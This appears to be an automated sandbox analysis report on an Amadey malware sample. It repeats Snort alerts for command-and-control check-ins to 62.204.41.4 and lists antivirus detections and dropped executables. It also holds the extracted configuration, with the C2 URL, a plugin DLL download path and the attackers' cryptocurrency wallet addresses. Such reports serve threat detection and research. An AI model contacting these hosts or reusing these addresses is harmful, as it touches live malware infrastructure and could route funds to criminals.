                              Timestamp:192.168.2.762.204.41.450243802027700 02/07/23-23:09:30.844574
                              SID:2027700
                              Source Port:50243
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450338802027700 02/07/23-23:09:54.241583
                              SID:2027700
                              Source Port:50338
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450065802027700 02/07/23-23:08:42.321938
                              SID:2027700
                              Source Port:50065
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450411802027700 02/07/23-23:10:11.977609
                              SID:2027700
                              Source Port:50411
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450019802027700 02/07/23-23:08:29.231063
                              SID:2027700
                              Source Port:50019
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450464802027700 02/07/23-23:10:26.781066
                              SID:2027700
                              Source Port:50464
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449886802027700 02/07/23-23:07:51.330001
                              SID:2027700
                              Source Port:49886
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450055802027700 02/07/23-23:08:39.857527
                              SID:2027700
                              Source Port:50055
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450233802027700 02/07/23-23:09:26.208391
                              SID:2027700
                              Source Port:50233
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449935802027700 02/07/23-23:08:06.241910
                              SID:2027700
                              Source Port:49935
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450171802027700 02/07/23-23:09:10.958890
                              SID:2027700
                              Source Port:50171
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450441802027700 02/07/23-23:10:21.186453
                              SID:2027700
                              Source Port:50441
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450085802027700 02/07/23-23:08:47.307738
                              SID:2027700
                              Source Port:50085
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449843802027700 02/07/23-23:07:40.769584
                              SID:2027700
                              Source Port:49843
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450263802027700 02/07/23-23:09:35.762539
                              SID:2027700
                              Source Port:50263
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449757802027700 02/07/23-23:07:16.570116
                              SID:2027700
                              Source Port:49757
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449876802027700 02/07/23-23:07:48.864985
                              SID:2027700
                              Source Port:49876
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449873802027700 02/07/23-23:07:48.143493
                              SID:2027700
                              Source Port:49873
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449702802027700 02/07/23-23:07:03.497685
                              SID:2027700
                              Source Port:49702
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449948802027700 02/07/23-23:08:09.418495
                              SID:2027700
                              Source Port:49948
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449698802027700 02/07/23-23:07:02.520211
                              SID:2027700
                              Source Port:49698
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450098802027700 02/07/23-23:08:50.686542
                              SID:2027700
                              Source Port:50098
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449830802027700 02/07/23-23:07:35.970669
                              SID:2027700
                              Source Port:49830
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450016802027700 02/07/23-23:08:28.501580
                              SID:2027700
                              Source Port:50016
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450454802027700 02/07/23-23:10:24.351476
                              SID:2027700
                              Source Port:50454
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450207802027700 02/07/23-23:09:19.807802
                              SID:2027700
                              Source Port:50207
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450276802027700 02/07/23-23:09:38.947586
                              SID:2027700
                              Source Port:50276
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450467802027700 02/07/23-23:10:27.519527
                              SID:2027700
                              Source Port:50467
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450230802027700 02/07/23-23:09:25.448061
                              SID:2027700
                              Source Port:50230
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449807802027700 02/07/23-23:07:30.407498
                              SID:2027700
                              Source Port:49807
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449978802027700 02/07/23-23:08:19.152480
                              SID:2027700
                              Source Port:49978
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450052802027700 02/07/23-23:08:39.150060
                              SID:2027700
                              Source Port:50052
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450348802027700 02/07/23-23:09:56.686065
                              SID:2027700
                              Source Port:50348
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449866802027700 02/07/23-23:07:46.384765
                              SID:2027700
                              Source Port:49866
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449860802027700 02/07/23-23:07:44.917311
                              SID:2027700
                              Source Port:49860
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449777802027700 02/07/23-23:07:23.237313
                              SID:2027700
                              Source Port:49777
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449955802027700 02/07/23-23:08:11.133835
                              SID:2027700
                              Source Port:49955
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450240802027700 02/07/23-23:09:30.031560
                              SID:2027700
                              Source Port:50240
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450151802027700 02/07/23-23:09:04.039199
                              SID:2027700
                              Source Port:50151
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450062802027700 02/07/23-23:08:41.588091
                              SID:2027700
                              Source Port:50062
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449850802027700 02/07/23-23:07:42.466685
                              SID:2027700
                              Source Port:49850
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450279802027700 02/07/23-23:09:39.671696
                              SID:2027700
                              Source Port:50279
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449945802027700 02/07/23-23:08:08.700275
                              SID:2027700
                              Source Port:49945
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450434802027700 02/07/23-23:10:19.489029
                              SID:2027700
                              Source Port:50434
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450345802027700 02/07/23-23:09:55.938392
                              SID:2027700
                              Source Port:50345
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449767802027700 02/07/23-23:07:19.936780
                              SID:2027700
                              Source Port:49767
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450368802027700 02/07/23-23:10:01.561612
                              SID:2027700
                              Source Port:50368
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450250802027700 02/07/23-23:09:32.516213
                              SID:2027700
                              Source Port:50250
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450457802027700 02/07/23-23:10:25.069012
                              SID:2027700
                              Source Port:50457
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449856802027700 02/07/23-23:07:43.927943
                              SID:2027700
                              Source Port:49856
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450161802027700 02/07/23-23:09:06.445124
                              SID:2027700
                              Source Port:50161
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450072802027700 02/07/23-23:08:44.049738
                              SID:2027700
                              Source Port:50072
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450167802027700 02/07/23-23:09:08.918959
                              SID:2027700
                              Source Port:50167
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450256802027700 02/07/23-23:09:34.024543
                              SID:2027700
                              Source Port:50256
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450078802027700 02/07/23-23:08:45.546416
                              SID:2027700
                              Source Port:50078
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450266802027700 02/07/23-23:09:36.481027
                              SID:2027700
                              Source Port:50266
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450355802027700 02/07/23-23:09:58.376240
                              SID:2027700
                              Source Port:50355
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450269802027700 02/07/23-23:09:37.221380
                              SID:2027700
                              Source Port:50269
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450006802027700 02/07/23-23:08:26.061962
                              SID:2027700
                              Source Port:50006
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450358802027700 02/07/23-23:09:59.107326
                              SID:2027700
                              Source Port:50358
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450447802027700 02/07/23-23:10:22.643400
                              SID:2027700
                              Source Port:50447
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449840802027700 02/07/23-23:07:40.053784
                              SID:2027700
                              Source Port:49840
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450177802027700 02/07/23-23:09:12.432080
                              SID:2027700
                              Source Port:50177
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449751802027700 02/07/23-23:07:15.127198
                              SID:2027700
                              Source Port:49751
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450444802027700 02/07/23-23:10:21.912071
                              SID:2027700
                              Source Port:50444
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449708802027700 02/07/23-23:07:04.970651
                              SID:2027700
                              Source Port:49708
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450088802027700 02/07/23-23:08:48.057973
                              SID:2027700
                              Source Port:50088
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449968802027700 02/07/23-23:08:14.393779
                              SID:2027700
                              Source Port:49968
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449761802027700 02/07/23-23:07:17.550184
                              SID:2027700
                              Source Port:49761
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450009802027700 02/07/23-23:08:26.787937
                              SID:2027700
                              Source Port:50009
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450342802027700 02/07/23-23:09:55.215790
                              SID:2027700
                              Source Port:50342
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449942802027700 02/07/23-23:08:07.961390
                              SID:2027700
                              Source Port:49942
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449853802027700 02/07/23-23:07:43.194714
                              SID:2027700
                              Source Port:49853
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449764802027700 02/07/23-23:07:18.587959
                              SID:2027700
                              Source Port:49764
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450253802027700 02/07/23-23:09:33.281756
                              SID:2027700
                              Source Port:50253
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450431802027700 02/07/23-23:10:18.720532
                              SID:2027700
                              Source Port:50431
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450075802027700 02/07/23-23:08:44.816817
                              SID:2027700
                              Source Port:50075
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450164802027700 02/07/23-23:09:07.186122
                              SID:2027700
                              Source Port:50164
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: 62.204.41.4/Gol478Ns/index.phpAvira URL Cloud: Label: malware
                              Source: http://62.204.41.4/Gol478Ns/index.phpAvira URL Cloud: Label: malware
                              Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dllAvira URL Cloud: Label: malware
                              Source: file.exeReversingLabs: Detection: 65%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dllReversingLabs: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeReversingLabs: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeReversingLabs: Detection: 55%
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeReversingLabs: Detection: 80%
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeReversingLabs: Detection: 44%
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeReversingLabs: Detection: 81%
                              Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllReversingLabs: Detection: 80%
                              Source: file.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoe Sandbox ML: detected
                              Source: 32.0.mnolyk.exe.1b0000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                              Source: 26.2.rundll32.exe.6ec20000.0.unpackMalware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_003D2F1D
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F32F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00F32F1D

                              Compliance

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeUnpacked PE file: 2.2.aPsf.exe.400000.0.unpack
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Source: Binary string: wextract.pdb source: file.exe, bPsg.exe.0.dr
                              Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.254759313.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.254673704.0000000004709000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 0000000E.00000000.319981682.000000000122E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 0000000F.00000000.321061276.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000F.00000002.776375932.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000017.00000000.324442770.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000017.00000002.331617769.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000000.454992434.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000002.455530364.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000020.00000000.583556891.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000020.00000002.583854303.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000021.00000002.713071373.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000021.00000000.712358400.00000000001DE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.14.dr, xriv.exe.0.dr
                              Source: Binary string: Healer.pdb source: aPsf.exe, 00000002.00000002.293044545.0000000002430000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293843993.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293157331.0000000002651000.00000004.00000800.00020000.00000000.sdmp, aPsf.exe, 00000002.00000002.292800577.0000000002040000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: wextract.pdbGCTL source: file.exe, bPsg.exe.0.dr
                              Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bPsg.exe, 00000001.00000003.255402987.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, bPsg.exe, 00000001.00000003.255338525.0000000004723000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000007.00000000.294247979.0000000000D42000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                              Source: Binary string: _.pdb source: aPsf.exe, 00000002.00000002.293044545.0000000002430000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293157331.0000000002651000.00000004.00000800.00020000.00000000.sdmp, aPsf.exe, 00000002.00000002.292800577.0000000002040000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\yoxici.pdb source: bPsg.exe, 00000001.00000003.255338525.00000000046E6000.00000004.00000020.00020000.00000000.sdmp, aPsf.exe, 00000002.00000000.255496089.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aPsf.exe.1.dr
                              Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 0000000F.00000002.776777410.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.776435922.000000006EC2F000.00000002.00000001.01000000.0000000C.sdmp, clip64[1].dll.15.dr, clip64.dll.15.dr
                              Source: Binary string: Healer.pdbH5 source: aPsf.exe, 00000002.00000002.293044545.0000000002430000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293843993.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, aPsf.exe, 00000002.00000002.293157331.0000000002651000.00000004.00000800.00020000.00000000.sdmp, aPsf.exe, 00000002.00000002.292800577.0000000002040000.00000004.00000020.00020000.00000000.sdmp
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_003D2390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exeCode function: 1_2_00F32390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00F32390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_0121FC58 FindFirstFileExW,14_2_0121FC58

                              Networking

                              barindex
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49694 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49697 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49698 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49699 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49700 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49701 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49702 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49703 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49704 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49705 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49706 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49707 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49708 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49709 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49710 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49711 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49712 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49713 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49714 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49715 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49716 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49717 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49718 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49719 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49720 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49721 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49722 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49723 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49724 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49725 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49726 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49727 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49728 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49729 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49730 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49731 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49732 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49733 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49734 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49735 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49736 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49737 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49738 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49739 -> 62.204.41.4:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.7:49740 -> 62.204.41.4:80
